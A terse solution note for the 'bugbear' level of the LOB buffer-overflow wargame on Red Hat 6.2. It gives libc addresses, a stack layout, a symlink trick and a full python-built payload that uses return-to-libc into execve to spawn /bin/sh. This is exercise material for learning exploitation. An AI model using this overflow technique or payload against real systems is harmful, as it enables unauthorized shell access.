LOB Redhat 6.2 - bugbear

bugbear - RTL2

stack : *ret[4] + *execve_addr[4] + *execve_offset[4] + *lib_addr[4] + *fp[4] + buffer[40] + sfp[4] + ret[4]1

execve : 0x400a9d48
exit : 0x400391e0

evecve(filename, *argv[], 0) -> execve("/bin/sh", &"/bin/sh", \x00, &NULL)

Symbolic Link : ln -s giant `python -c 'print "\xf9\xbf\x0f\x40"'` (address of "/bin/sh")

"/bin/sh" : 0x400fbff9
&"/bin/sh", \x00 : 0xbffffff7
&NULL :  0xbffffffc

Payload : ./`python -c 'print "\xf9\xbf\x0f\x40"'` "`python -c 'print "A"*44 + "\x48\x9d\x0a\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40" + "\xf7\xff\xff\xbf" + "\xfc\xff\xff\xbf"'`"

Using RTL_execve